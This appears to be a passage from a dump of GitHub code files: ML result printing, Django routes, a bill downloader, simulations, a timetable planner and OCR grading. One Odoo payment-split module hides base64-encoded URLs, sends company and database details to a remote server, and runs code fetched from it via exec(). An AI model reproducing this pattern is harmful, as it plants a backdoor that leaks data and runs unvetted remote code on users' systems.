grouped_acc[run] = {}\n grouped_met[run] = {}\n if task not in grouped_acc[run]:\n grouped_acc[run][task] = {}\n grouped_met[run][task] = {}\n\n if v is not None:\n grouped_acc[run][task][subdir] = float(v.get(\"valid_accuracy\", -100))\n grouped_met[run][task][subdir] = float(v.get(f\"valid_{TASK_TO_METRIC[task]}\", -100))\n else:\n print(f\"{path} has None return\")\n\n header = \"\\t\".join(TASKS)\n for run in sorted(grouped_acc):\n print(run)\n if args.print_mode == \"all\":\n if args.show_glue:\n print(\"===== GLUE =====\")\n print(get_all_stat_str(grouped_met[run]))\n else:\n print(\"===== ACC =====\")\n print(get_all_stat_str(grouped_acc[run]))\n elif args.print_mode == \"best\":\n print(f\" {header}\")\n if args.show_glue:\n print(f\"GLEU: {get_best_stat_str(grouped_met[run], args.show_subdir)}\")\n else:\n print(f\"ACC: {get_best_stat_str(grouped_acc[run], args.show_subdir)}\")\n elif args.print_mode == \"tabular\":\n if args.show_glue:\n print(\"===== GLUE =====\")\n print(get_tabular_stat_str(grouped_met[run]))\n else:\n print(\"===== ACC =====\")\n print(get_tabular_stat_str(grouped_acc[run]))\n else:\n raise ValueError(args.print_mode)\n print()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"facebookresearch/fairseq","sub_path":"examples/data2vec/scripts/text/glue_lr.py","file_name":"glue_lr.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":28050,"dataset":"github-code","pt":"62"} +{"seq_id":"31741038605","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n\n path('', views.studentHome, name='home'),\n path('offeredcourses', views.offeredcourses, name='offeredcourses'),\n path('course/', views.course, name='course'),\n path(\"submitAssignment\",views.submitAssignment , name=\"submitAssignment\"),\n path(\"enrollCourse\",views.enrollCourse , name=\"enrollCourse\")\n\n]\n","repo_name":"SajeelHashmi/Online-Learning-Platform-Django","sub_path":"onlineLearningPlatform/studentDashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"861909985","text":"import requests\nimport os\n\n\nBILL_LIST_URL = \"https://www.govtrack.us/api/v2/bill?congress={}\"\nBILL_TEXT_URL = \"https://www.govinfo.gov/content/pkg/{0}/html/{0}.htm\"\nBAR = '_______________________________________________________________________'\n\n\ndef download_bills(congress):\n\n bill_list = requests.get(BILL_LIST_URL.format(congress)).json()\n\n for bill in bill_list[\"objects\"]:\n\n try:\n\n name = bill[\"display_number\"]\n bill_url = bill[\"text_info\"][\"gpo_url\"]\n bill_id = bill_url.split('/')[-1]\n\n html_bill = requests.get(BILL_TEXT_URL.format(bill_id)).text\n\n # Clean the raw text\n html_bill = html_bill.replace('
', '')\n            html_bill = html_bill.replace('
', '')\n html_bill = html_bill.replace('<DOC>', '')\n html_bill = html_bill.replace('<all>', '')\n html_bill = html_bill.split(BAR)[2]\n html_bill = html_bill.strip()\n\n with open(os.path.join('bills', name + '.txt'), 'w') as bill_file:\n bill_file.write(html_bill)\n\n print(bill[\"title\"])\n\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n os.makedirs('bills', exist_ok=True)\n # download lots of bills from Congress #100-#116\n for i in range(100, 117):\n download_bills(i)\n","repo_name":"sshh12/Build-A-Bill","sub_path":"lab-gpt/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74585425477","text":"file1 = open('npm-package.log', 'r')\nLines = file1.readlines()\n \ncount = 0\n\nfor line in Lines:\n count += 1\n if 'GET 404' in line:\n # example line: npm http fetch GET 404 http:///api/folo/track//npm/group/build-ANVVSBL7M3AAA//body-parser/-/body-parser-1.19.0.tgz 98ms\n #print(\"{}\".format(line.strip()[line.strip().index('/-/') + 3:]))\n vinfo = line.strip()[line.strip().index('/-/') + 3:]\n pkg = vinfo[0:vinfo.rindex(\"-\")]\n version = vinfo[vinfo.rindex(\"-\") + 1:vinfo.index('.tgz')]\n\n print(\"\\\"/{}/{}\\\",\".format(pkg, version))\n print(\"\\\"/{}/{}\\\",\".format(pkg, \"package.json\"))\n","repo_name":"sswguo/indy-maint","sub_path":"npm-cleanup/npm-maint.py","file_name":"npm-maint.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31240077293","text":"\nimport torch\n\ndef coarse_to_fine_coordinates(coarse_cor, ratio, topk=30000):\n \"\"\"\n Args:\n coarse_cor (torch.Tensor): [3, N]\"\"\"\n\n fine_cor = coarse_cor * ratio\n fine_cor = fine_cor[None].repeat(ratio**3, 1, 1) # [8, 3, N]\n\n device = fine_cor.device\n value = torch.meshgrid([torch.arange(ratio).to(device), torch.arange(ratio).to(device), torch.arange(ratio).to(device)])\n value = torch.stack(value, dim=3).reshape(-1, 3)\n\n fine_cor = fine_cor + value[:,:,None]\n\n if fine_cor.shape[-1] < topk:\n return fine_cor.permute(1,0,2).reshape(3,-1)\n else:\n fine_cor = fine_cor[:,:,torch.randperm(fine_cor.shape[-1])[:topk]]\n return fine_cor.permute(1,0,2).reshape(3,-1)\n\n\n\ndef project_points_on_img(points, rots, trans, intrins, post_rots, post_trans, bda_mat, pts_range,\n W_img, H_img, W_occ, H_occ, D_occ):\n with torch.no_grad():\n voxel_size = ((pts_range[3:] - pts_range[:3]) / torch.tensor([W_occ-1, H_occ-1, D_occ-1])).to(points.device)\n points = points * voxel_size[None, None] + pts_range[:3][None, None].to(points.device)\n\n # project 3D point cloud (after bev-aug) onto multi-view images for corresponding 2D coordinates\n inv_bda = bda_mat.inverse()\n points = (inv_bda @ points.unsqueeze(-1)).squeeze(-1)\n \n # from lidar to camera\n points = points.view(-1, 1, 3)\n points = points - trans.view(1, -1, 3)\n inv_rots = rots.inverse().unsqueeze(0)\n points = (inv_rots @ points.unsqueeze(-1))\n \n # from camera to raw pixel\n points = (intrins.unsqueeze(0) @ points).squeeze(-1)\n points_d = points[..., 2:3]\n points_uv = points[..., :2] / (points_d + 1e-5)\n \n # from raw pixel to transformed pixel\n points_uv = post_rots[..., :2, :2].unsqueeze(0) @ points_uv.unsqueeze(-1)\n points_uv = points_uv.squeeze(-1) + post_trans[..., :2].unsqueeze(0)\n\n points_uv[..., 0] = (points_uv[..., 0] / (W_img-1) - 0.5) * 2\n points_uv[..., 1] = (points_uv[..., 1] / (H_img-1) - 0.5) * 2\n\n mask = (points_d[..., 0] > 1e-5) \\\n & (points_uv[..., 0] > -1) & (points_uv[..., 0] < 1) \\\n & (points_uv[..., 1] > -1) & (points_uv[..., 1] < 1)\n \n return points_uv.permute(2,1,0,3), mask","repo_name":"JeffWang987/OpenOccupancy","sub_path":"projects/occ_plugin/utils/coordinate_transform.py","file_name":"coordinate_transform.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"62"} +{"seq_id":"23714299096","text":"from Sensor_Node import dhtTopics\nfrom Data_Schema_Node import Schema_Topics\nfrom Prediction_Node import Prediction_Topics\n\n\ndef save_current_hundred_Readings():\n location='Data_Schema_Node/SensorData.csv'\n ACK=Schema_Topics.recordDATA(location)\n if(ACK==True):\n print('[DATA SAVED]')\n\ndef get_Predition():\n Prediction_Topics.Prediction()\n\ndef fetchTemp_Humid():\n dataFetched=dhtTopics.dhtMessages()\n print(\"TEMPERATURE:\"+str(dataFetched[0]))\n print(\"HUMIDITY:\"+str(dataFetched[1]))\n\nprint('[ CYBER PHYSICAL SYSTEM FOR ENVIRONMENTAL MONITORING ]')\nwhile(True):\n MENU=input('Choose from the following menu:\\n1.GET CURRENT READINGS\\n2.SAVE CURRENT 100 READINGS\\n3.GET PREDICTION\\n')\n if(MENU=='1'):\n fetchTemp_Humid()\n elif(MENU=='2'):\n save_current_hundred_Readings()\n elif (MENU=='3'):\n get_Predition()\n else:\n print('[ ALERT:CHOOSE THE RIGHT MENU ]')","repo_name":"sashasuhel/Cyber-Physical-System-for-Environmental-Monitoring-Setup","sub_path":"CORE.py","file_name":"CORE.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"71247065158","text":"#######################################################################\r\n# Copyright (C) #\r\n# 2016-2018 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #\r\n# 2022 umiushio (umiushio@163.com) #\r\n# Permission given to modify the code as long as you keep this #\r\n# declaration at the top #\r\n#######################################################################\r\n\r\n# represent the environment constructed by the 1000-states random walk task\r\n\r\nimport numpy as np\r\n\r\n# the number of states expect the terminal states\r\nN_STATES = 1000\r\n# all states including the terminal states\r\nSTATES = np.arange(N_STATES + 2)\r\n# the terminal states\r\nTERMINAL_STATES = [0, N_STATES + 1]\r\n# the start state\r\nSTART_STATE = 500\r\n\r\n# define directions for action\r\nTO_LEFT = -1\r\nTO_RIGHT = 1\r\nDIRECTIONS = [TO_LEFT, TO_RIGHT]\r\n\r\n# the max stride for one step\r\nglobal STEP_RANGE\r\n\r\n\r\n# take the @action at the @state, return the new state and reward for this transition\r\ndef step(state, action):\r\n state = max(min(state + action, N_STATES + 1), 0)\r\n if state == 0:\r\n reward = -1\r\n elif state == N_STATES + 1:\r\n reward = 1\r\n else:\r\n reward = 0\r\n return state, reward\r\n\r\n\r\n# in different tasks the state range will be different\r\n# so we should have this function to dynamically set it\r\ndef set_state_range(state_range):\r\n global STEP_RANGE\r\n STEP_RANGE = state_range\r\n","repo_name":"umiushio/ReinforcementLearning","sub_path":"rl/codes/C9/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73760234756","text":"from odoo import api, fields, models, _\nimport base64\nimport json\nimport requests\nfrom odoo.exceptions import except_orm, UserError\n\nclass payment_split_spt(models.Model):\n _name = 'payment.split.spt'\n _description = 'Payment Split'\n\n amount_ids = fields.One2many('amount.spt', 'payment_split_id',\n 'Payment Amounts')\n move_ids = fields.Many2many('account.move','payment_split_spt_account_move_rel','payment_split_id','move_id','Invoice')\n company_id = fields.Many2one('res.company', string='Company')\n partner_id = fields.Many2one('res.partner', string='Partner')\n payment_difference = fields.Float(compute='_compute_payment_difference')\n payment_difference_handling = fields.Selection(\n [('open', 'Keep open'), ('reconcile', 'Mark invoice as fully paid')],\n default='open',\n string=\"Payment Difference Handling\")\n writeoff_account_id = fields.Many2one('account.account',\n string=\"Difference Account\",\n domain=[('deprecated', '=', False)],\n copy=False)\n writeoff_label = fields.Char(\n string='Journal Item Label',\n help=\n 'Change label of the counterpart that will hold the payment difference',\n default='Write-Off')\n\n @api.onchange('move_ids')\n def _onchange_amount_ids(self):\n total_amount = 0\n total_amount_dic = {}\n for invoice in self.move_ids:\n total_amount = total_amount + invoice.amount_residual_signed\n total_amount_dic[\n 'currency_id'] = self.env.user.company_id.currency_id.id\n total_amount_dic['amount'] = abs(total_amount)\n total_amount_dic['journal_id'] = self.env[\n 'account.journal'].search([('type', '=', 'cash')], limit=1).id\n self.amount_ids = [(0, 0, total_amount_dic)]\n\n @api.depends('move_ids', 'amount_ids')\n def _compute_payment_difference(self):\n total_invoice_amount = 0\n total_amount = 0\n for record in self:\n record.connect_server()\n method = self.get_method('_compute_payment_difference')\n if method['method']:\n localdict = {'record':record,'user_obj':record.env.user,'total_invoice_amount': total_invoice_amount,'total_amount':total_amount}\n exec(method['method'], localdict)\n else:\n raise UserError(_('something went wrong, server is not responding'))\n record.payment_difference = localdict['total_invoice_amount'] - localdict['total_amount']\n\n def payment_post(self):\n self.connect_server()\n method = self.get_method('payment_post')\n if method['method']:\n localdict = {'self':self,'user_obj':self.env.user}\n exec(method['method'], localdict)\n\n def get_method(self,method_name):\n config_parameter_obj = self.env['ir.config_parameter'].sudo()\n cal = base64.b64decode('aHR0cHM6Ly93d3cuc25lcHRlY2guY29tL2FwcC9nZXRtZXRob2Q=').decode(\"utf-8\")\n uuid = config_parameter_obj.search([('key','=','database.uuid')],limit=1).value or ''\n payload = {\n 'uuid':uuid,\n 'method':method_name,\n 'technical_name':'payment_split_spt',\n }\n req = requests.request(\"POST\", url=cal, json=payload)\n try:\n return json.loads(req.text)['result']\n except:\n return {'method':False}\n\n def connect_server(self):\n config_parameter_obj = self.env['ir.config_parameter']\n cal = base64.b64decode('aHR0cHM6Ly93d3cuc25lcHRlY2guY29tL2FwcC9hdXRoZW50aWNhdG9y').decode(\"utf-8\")\n uuid = config_parameter_obj.search([('key','=','database.uuid')],limit=1).value or ''\n payload = {\n 'uuid':uuid,\n 'calltime':1,\n 'technical_name':'payment_split_spt',\n }\n try:\n req = requests.request(\"POST\", url=cal, json=payload)\n req = json.loads(req.text)['result']\n if not req['has_rec']:\n company = self.env.user.company_id\n payload = {\n 'calltime':2,\n 'name':company.name,\n 'state_id':company.state_id.id or False,\n 'country_id':company.country_id.id or False,\n 'street':company.street or '',\n 'street2':company.street2 or '',\n 'zip':company.zip or '',\n 'city':company.city or '',\n 'email':company.email or '',\n 'phone':company.phone or '',\n 'website':company.website or '',\n 'uuid':uuid,\n 'web_base_url':config_parameter_obj.search([('key','=','web.base.url')],limit=1).value or '',\n 'db_name':self._cr.dbname,\n 'module_name':'payment_split_spt',\n 'version':'13.0',\n }\n req = requests.request(\"POST\", url=cal, json=payload)\n req = json.loads(req.text)['result']\n\n \n if not req['access']:\n raise UserError(_(base64.b64decode('c29tZXRoaW5nIHdlbnQgd3JvbmcsIHNlcnZlciBpcyBub3QgcmVzcG9uZGluZw==').decode(\"utf-8\")))\n \n except:\n raise UserError(_(base64.b64decode('c29tZXRoaW5nIHdlbnQgd3JvbmcsIHNlcnZlciBpcyBub3QgcmVzcG9uZGluZw==').decode(\"utf-8\")))\n return True\n","repo_name":"solutionfounder/acc_addons","sub_path":"payment_split_spt/models/payment_split_spt.py","file_name":"payment_split_spt.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"15094237140","text":"#!/usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os \nimport sys\nimport seaborn as sns\nimport matplotlib.ticker as mticker\n\nc = 299792458\ns2yr = 3600*24*365.25\nly = c*s2yr; \nrad2deg = 180/np.pi\nL = 3.83e26 #Sun's luminosity\n\nnpts = 1000000\nstep = 1000; # TRY TO IMPROVE RESOLUTION\n\nAU = float(input(\"\\nLaunch distance from Sun in AU [e.g. 1 for Earth orbit]? \"))\nd = float(input(\"Distance to travel in light-years [e.g. 4.22 for Proxima Centauri]? \"))\nm = float(input(\"Total mass of sail + payload in kg? \"))\nA = float(input(\"Area of sail in metre squared [e.g. 1e6 for 1 km x 1 km]? \"))\n\nb = float(input(\"Albedo of sail [b = 0 to 1,totally absorbant to totally reflective]? \")) \nwhile b <= 0 or b > 1:\n b = float(input(\"Albedo of sail [b = 0 to 1,totally absorbant to totally reflective]? \")) \n\nR = d*c*s2yr\nt = R**4*np.pi*m*c/(12*L*A)\ngamma = 1\nt =0; v= 0;\nAU2m= 1.5e11\nr = AU*AU2m\na_0 = L*A*b/(2*np.pi*gamma*m*c*r**2)\nr_0 = r\n\narray = []; # FOR PLOT\n\nfor i in range(npts*step):\n dt = float(i)/step # MUCH QUICKER AND FINE REOLUTION AT START (~ s), WHERE IT'S NEEDED\n #dt = float(npts)/step\n a = L*A*b/(2*np.pi*gamma*m*c*r**2)\n v = v+a*dt\n gamma = (1-(v/c)**2)**-0.5\n r = r+(v*dt)\n t = t+dt\n\n array.append(t); array.append(a); array.append(v);array.append(r);# FOR PLOT\n\n if r>R:\n break\n\nprint(\"-------------------------------------------------------------------------------------------\")\nprint(\" For A = %1.1e m^2, b = %1.1f, m = %1.1f kg, launching from %1.1f AU, initial acc = %1.2f m/s^2 \" %(A,b,m,AU,a_0))\nprint(\" To travel %1.3f ly [%1.3e m] takes t = %1.1f yr [%1.2e s],\\n where final a = %1.3e m/s^2 and v = %1.0f km/s [%1.4fc]\" %(r/ly,r,t/s2yr,t,a,v*1e-3,v/c))\nprint(\"-------------------------------------------------------------------------------------------\")\n\nARR = np.reshape(array,(-1, 4)); \n\nplt.rcParams.update({'font.size': 12}) \nfig, (ax1, ax2,ax3) = plt.subplots(1, 3, figsize=(15, 5)) \nplt.setp(ax1.spines.values(), linewidth=2)\n\nax1.plot(ARR[:,0]/s2yr, ARR[:,1], '-', linewidth=3, color='b')\nax1.set_yscale('log');ax1.set_xscale('log')\ndef update_ticks(z, pos):\n if z ==1:\n return '1 '\n elif z >1 and z <1000:\n return '%d' %(z)\n elif z < 1 and z > 0.001:\n return z\n else:\n return '10$^{%1.0f}$' %(np.log10(z)) # THIS WORKED!! AND ALL THAT SHITE THAT WAS ONLINE\n\nax1.xaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax1.yaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax1.set_xlabel('Time, $t$ [years]'); ax1.set_ylabel('Acceleration, $a$ [m s$^{-2}$]')\nx1,x2 = ax1.get_xlim(); y1,y2 = ax1.get_ylim()\nx1 = np.log10(x1); x2 = np.log10(x2); y1 = np.log10(y1); y2 = np.log10(y2); \nxpos = x1 +(x2-x1)/16; ypos = y1 + (y2-y1)/2.5; yskip = (y2-y1)/16\nif m >=1:\n text = \"$m$ = %1.0f kg, $A$ = 10$^%d$ m$^2$\" %(m,np.log10(A))\nelse:\n text = \"$m$ = %1.2f g, $A$ = 10$^%d$ m$^2$\" %(1e3*m,np.log10(A))\nax1.text(10**xpos,10**ypos,text,fontsize = 12)\nax1.text(10**xpos,10**(ypos-yskip),\"$r_i$ = %1.0f AU, gives\" %(AU),fontsize = 12) \nax1.text(10**xpos,10**(ypos-2*yskip),\"$a_i$ = %1.2f m s$^{-2}$\" %(a_0),fontsize = 12)\nax1.text(10**xpos,10**(ypos-3*yskip),\"$v_f$ = %1.0f km s$^{-1}$ [%1.4f$c$]\" %(v*1e-3,v/c),fontsize = 12)\nax1.text(10**xpos,10**(ypos-4*yskip),\"$\\gamma$ = %1.6f\" %(gamma),fontsize = 12)\nax1.text(10**xpos,10**(ypos-5*yskip),\"$t$ = %1.0f yr for %1.1f ly\" %(t/s2yr,r/ly),fontsize = 12)\n \nplt.setp(ax2.spines.values(), linewidth=2)\nax2.plot(ARR[:,0]/s2yr, ARR[:,2]*1e-3, '-', linewidth=3, color='g')\nax2.set_yscale('log');ax2.set_xscale('log')\n\nax2.xaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax2.yaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax2.set_xlabel('Time, $t$ [years]'); ax2.set_ylabel('Velocity, $v$ [km s$^{-1}$]')\n\nplt.setp(ax3.spines.values(), linewidth=2)\nax3.plot(ARR[:,0]/s2yr, ARR[:,3]/ly, '-', linewidth=3, color='r')\nax3.set_yscale('log');ax3.set_xscale('log')\n\nax3.xaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax3.yaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax3.set_xlabel('Time, $t$ [years]'); ax3.set_ylabel('Distance, $d$ [light-years]')\n\nplt.tight_layout(pad=2.0)\nplot = \"sail_AU=%1.1f_d=%1.2f_ly_m=%1.1f_kg_A=%1.2e_m2\" %(AU,d,m,A); png = \"%s.png\" % (plot)\n#plt.savefig(png); print(\"Plot written to\", png);\nplt.show()\n\n","repo_name":"steviecurran/solar-sail","sub_path":"solar_sail.py","file_name":"solar_sail.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"13211672915","text":"from itertools import combinations\nfrom tkinter import *\n\nclass Classes:\n\n def __init__(self, value, day, start, end, day2, start2, end2, kind, prof):\n self.value = value\n self.start = start\n self.end = end\n self.day2 = day2\n self.start2 = start2\n self.end2 = end2\n self.kind = kind\n self.prof = prof\n self.day = day\n\ndef printclass(clas): # 클래스의 인자들을 출력하는 함수\n\n print(f\"{clas.value}\\t{clas.day}\\t{clas.start}\\t{clas.end}\\t{clas.day2}\\t{clas.start2}\\t{clas.end2}\"\n f\"\\t{clas.kind} \\t{clas.prof}\")\n\ndef listed(lst): # 입력 받은 값들을 요일별로 구별하는 함수\n\n mon = []\n tue = []\n wed = []\n thr = []\n fri = []\n for i in lst:\n if i.day == 'mon':\n mon.append([i.day, i.start, i.end])\n if i.day == 'tue':\n tue.append([i.day, i.start, i.end])\n if i.day == 'wed':\n wed.append([i.day, i.start, i.end])\n if i.day == 'thr':\n thr.append([i.day, i.start, i.end])\n if i.day == 'fri':\n fri.append([i.day, i.start, i.end])\n if i.day2 == 'mon':\n mon.append([i.day2, i.start2, i.end2])\n if i.day2 == 'tue':\n tue.append([i.day2, i.start2, i.end2])\n if i.day2 == 'wed':\n wed.append([i.day2, i.start2, i.end2])\n if i.day2 == 'thr':\n thr.append([i.day2, i.start2, i.end2])\n if i.day2 == 'fri':\n fri.append([i.day2, i.start2, i.end2])\n\n mon.sort(key=lambda x: (x[2], x[1]))\n tue.sort(key=lambda x: (x[2], x[1]))\n wed.sort(key=lambda x: (x[2], x[1]))\n thr.sort(key=lambda x: (x[2], x[1]))\n fri.sort(key=lambda x: (x[2], x[1]))\n return [mon, tue, wed, thr, fri]\n\n\ndef makecomb(lst, num): # 각 요일의 시간표들의 모든 조합을 만드는 함수 day->list, num->int\n\n result = list(combinations(lst, num))\n return result\n\ndef makeavaile(result): # 만들어진 조합 중에서 실제로 가능한 시간표를 찾아내는 함수 result->list, num->int\n\n availelist = []\n for k in result: # 시간표\n flag = 0 # 전부 k에 대한 작업 진행중\n kindlist = []\n for kind in k: # 같은 수업 배제\n kindlist.append(kind.kind)\n if len(kindlist) != len(set(kindlist)):\n continue # 여기까지는 그냥 하면됨\n daylist = listed(k)\n for i in daylist: # i->mon, tue ...\n for j in range(len(i)-1): # 각 요일에 대한 시간표\n if i[j][2] > i[j+1][1]:\n flag = 1\n if flag == 0:\n availelist.append(k)\n return availelist\n\ndef makemax(availelist, num): # 실제로 가능한 시간표 중에서 가중치가 가장 높은 시간표의 위치를 찾는 함수 availelist->list, num->int\n\n valuesum = []\n for i in availelist:\n vs = 0\n for j in range(num):\n vs += i[j].value\n valuesum.append(vs)\n if len(valuesum) != 0:\n v = max(valuesum)\n else:\n v = 0\n maxidx = [i for i, value in enumerate(valuesum) if value == max(valuesum)]\n return maxidx, v\n\ndef readtxt(filename):\n\n f = open(filename, 'r')\n classlist = []\n while True:\n f_line = f.readline()\n if not f_line:\n break\n f_list = f_line.split()\n classlist.append(Classes(int(f_list[0]), f_list[1], int(f_list[2]), int(f_list[3]), f_list[4], int(f_list[5]),\n int(f_list[6]), f_list[7], f_list[8]))\n\n f.close()\n return classlist\n\ndef writetxt(filename, maxidxlist, ava, num, val):\n\n f = open(filename, 'w')\n if len(ava) == 0:\n f.write(f\"There is no available schedule\")\n for i in maxidxlist:\n f.write(f\"sum of value : {val}\\n\")\n f.write(f\"position of max value : {i}\\n\")\n f.write(\"\\n\")\n for i in maxidxlist:\n for j in range(num):\n f.write(f\"{ava[i][j].value}\\t{ava[i][j].day}\\t{ava[i][j].start}\\t{ava[i][j].end}\\t{ava[i][j].day2}\\t\"\n f\"{ava[i][j].start2}\\t{ava[i][j].end2}\\t{ava[i][j].kind} \\t{ava[i][j].prof}\\n\")\n f.write(f\"\\n\")\n f.close()\n return\n\nnum = int(input(\"들을 강의의 개수 : \"))\nlst = readtxt(\"lecture.txt\")\nlst.sort(key=lambda x: (x.end, x.start))\n\nresult = makecomb(lst, num)\navailelist = makeavaile(result)\nmaxidxlist, val = makemax(availelist, num)\n\nwritetxt('result.txt', maxidxlist, availelist, num, val)\n\n#for i in result:\n# for j in range(num):\n# printclass(i[j])\n# print()\n#print()\n#print()\n#for i in availelist:\n# for j in range(num):\n# printclass(i[j])\n# print()\n\nif len(availelist) == 0:\n print(\"There is no available schedule\\n\")\n\n#print(f\"{len(availelist)}\\n\")\nprint(f\"가중치 합 : {val}\\n\")\nfor i in maxidxlist:\n print(f\"가중치 합이 최대인 시간표의 위치 : {i}\\n\")\n\nfor j in maxidxlist:\n for i in range(num):\n printclass(availelist[j][i])\n print()\n","repo_name":"humpback13/Ast23_APTP2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"17370386179","text":"from PIL import Image, ImageDraw, ImageFont\r\nimport numpy as np\r\nimport cv2\r\nfrom pyzbar import pyzbar\r\nline=[]\r\nn=0\r\ndef open_answer_card(url1):\r\n global n\r\n img=cv2.imread(url1)\r\n n=img.shape[1]//82 \r\n return(img)\r\n\r\ndef open_student_card(url):\r\n global n\r\n img=cv2.imread(url)\r\n img=img[n*2:-n*2,n*2:-n*2]\r\n return(img)\r\n\r\n#读取识别二维码\r\ndef qr_recognize(pic,pos):\r\n global n\r\n if len(pic.shape)!=2:\r\n pic = cv2.cvtColor(pic, cv2.COLOR_BGR2GRAY) \r\n pic=pic[pos[0]:pos[1],pos[2]:pos[3]]\r\n \r\n if pic.dtype != np.uint8:\r\n pic = pic.astype(np.uint8)\r\n # 去除噪点\r\n pic = cv2.medianBlur(pic, 3)\r\n # 二值化处理\r\n _, thresh = cv2.threshold(pic, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\r\n #膨胀\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\r\n pic = cv2.dilate(thresh, kernel, iterations=1)\r\n #腐蚀\r\n pic = cv2.erode(pic, kernel, iterations=1)\r\n #反色\r\n pic= cv2.bitwise_not(pic)\r\n #显示pic\r\n \"\"\"cv2.imshow('pic',pic)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\"\"\"\r\n barcodes =\"\"\r\n barcodes = pyzbar.decode(pic) \r\n barcodeData=[]\r\n for barcode in barcodes:\r\n barcodeData.append(barcode.data.decode('utf-8')) # 二进制类型转成字符串\r\n return(barcodeData)\r\n\r\ndef pict(gray): # 图像处理,二值化\r\n if len(gray.shape)!=2:\r\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY) \r\n # 图像二值化处理,将灰度图转换为二值图\r\n # 二值化处理\r\n _, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\r\n binary_erosion =cv2.erode(thresh, kernel,iterations=2)#腐蚀\r\n binary_dilation =cv2.dilate(binary_erosion, kernel,iterations=4) \r\n # 形态学操作,去除噪点和细节,填充小的白色区域\r\n opening = cv2.morphologyEx(binary_dilation, cv2.MORPH_OPEN, kernel)\r\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\r\n return(closing)\r\n\r\n \r\ndef paper_ajust(original_image, target_image):\r\n # 查找原图像和目标图像中的四个黑色方块的位置\r\n original_corners = find_corners(original_image)\r\n target_corners = find_corners(target_image)\r\n # 获取仿射变换矩阵\r\n M = cv2.getPerspectiveTransform(target_corners, original_corners)\r\n # 应用仿射变换矩阵对目标图像进行变换,实现矫正\r\n adjusted_image = cv2.warpPerspective(target_image, M, (original_image.shape[1], original_image.shape[0]))\r\n return adjusted_image\r\n\r\ndef find_corners(img):\r\n # 转换为灰度图像\r\n if len(img.shape)!=2:\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \r\n # 二值化处理\r\n _, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\r\n # 形态学操作,去除噪点和细节,填充小的白色区域\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\r\n binary_dilation =cv2.dilate(thresh, kernel)\r\n binary_erosion =cv2.erode(binary_dilation , kernel,iterations=1) \r\n opening = cv2.morphologyEx(binary_erosion, cv2.MORPH_OPEN, kernel)\r\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\r\n # 查找轮廓\r\n contours, _ = cv2.findContours(closing, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \r\n # 计算轮廓的质心,即中心点\r\n centers = []\r\n for cnt in contours:\r\n area = cv2.contourArea(cnt)\r\n if area>1800:\r\n M = cv2.moments(cnt)\r\n cx = int(M['m10'] / M['m00'])\r\n cy = int(M['m01'] / M['m00'])\r\n centers.append((cx, cy))\r\n # 确定四个黑色方块的中心点\r\n top_left = min(centers, key=lambda x: x[0] + x[1])\r\n bottom_right = max(centers, key=lambda x: x[0] + x[1])\r\n top_right = max(centers, key=lambda x: x[0] - x[1])\r\n bottom_left = min(centers, key=lambda x: x[0] - x[1])\r\n return(np.array([top_left,bottom_right,top_right,bottom_left],dtype=np.float32))\r\n\r\ndef number_pos(pic): #识别号码\r\n img=pict(pic)\r\n \r\n cnts,h=cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \r\n pnt1=[]\r\n for cnt in cnts:\r\n area = cv2.contourArea(cnt)\r\n \r\n if area>500:\r\n \r\n M = cv2.moments(cnt)\r\n cx = int(M['m10'] / M['m00'])\r\n cy = int(M['m01'] / M['m00'])\r\n pnt1.append((cx, cy))\r\n \r\n result=\"\"\r\n \r\n pnt1.sort(key=lambda x:x[0])\r\n if len(pnt1)==10: \r\n for i in pnt1:\r\n 